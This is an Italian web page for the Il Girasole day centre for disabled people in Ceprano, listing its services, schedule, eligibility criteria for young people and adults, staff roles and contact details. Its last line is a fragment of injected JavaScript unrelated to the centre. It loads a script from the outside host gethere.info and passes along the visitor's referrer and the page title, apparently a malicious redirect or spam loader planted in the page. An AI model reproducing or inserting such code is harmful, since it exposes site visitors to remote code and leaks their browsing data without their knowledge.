CENTRO DIURNO PER DISABILI DI CEPRANO IL GIRASOLE

Il Centro diurno per disabili Il Girasole è un servizio intercomunale del Sub-ambito, appartenente al Distretto SA FRB di Frosinone, di cui Ente Capofila è il Comune di Ceprano e si propone l’accoglienza diurna di 11 persone disabili residenti in alcuni dei Comuni del Sub-ambito stesso (Arnara, Ceprano, Pastena, Pofi e Ripi). 

Il Centro fornisce diverse tipologie di attività (ospitalità diurna, accudimento alla persona, attività di osservazione e orientamento mirate, trasporto) che si svolgono tutto l′anno per 4 giorni a settimana, dal Martedì al Venerdì, dalle 9:30 alle 12:30, con una sospensione per l’intero mese di Agosto, durante le festività Natalizie per due settimane e durante le festività Pasquali per una settimana.

Scheda sintetica

Servizio

Centro diurno per disabili

Tipologia del servizio

tipo A

Committente

Sub ambito Comuni di Ceprano, Arnara, Pastena, Pofi, Ripi – Capofila Ceprano (FR)

Coordinatore

Sara Gagliardi

Posti

11

Indirizzo

Via Ponterotto, 1 – 03024 Ceprano (FR)

Tel./Fax

0775.914007

Cell.

340.1538753

Email

gagliardi@altricolori.it

Periodo

dal 2008 a tutt′oggi

UTENZA

  • Parzialmente scolarizzabili o non più scolarizzabili a partire da anni 11 fino ad anni 17 con handicap lieve – medio e grave di tipo psico-fisico e sensoriale , in possesso della certificazione di cui alle legge 104/92.
  • Soggetti adulti, in età compresa tra i 18 e i 45 anni, con handicap lieve, medio e grave di tipo psico-fisico e sensoriale in possesso della certificazione di cui alla legge 104/92 per i quali non è possibile , per le condizioni del soggetto o per la mancanza di risposte in ambito territoriale, altra forma di inserimento sociale. 

Sono esclusi dall′ammissione al centro, gli utenti con patologie prettamente psichiatriche già seguiti dai servizi specifici della Azienda Sanitaria e con certificazione medica specifica.

IL PERSONALE

  • EDUCATORE PROFESSIONALE con mansioni di responsabile del Centro.
  • OPERATORI SOCIO SANITARI con il compito di accoglienza e cura degli utenti e di gestione quotidiana delle attività che si organizzano presso il centro.
  • AUTISTA con il compito di svolgere il servizio di trasporto degli utenti dalle proprie abitazioni al centro andata e ritorno.
  • ADDETTA ALLE PULIZIE con il compito di pulizia e igiene dei locali del centro.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;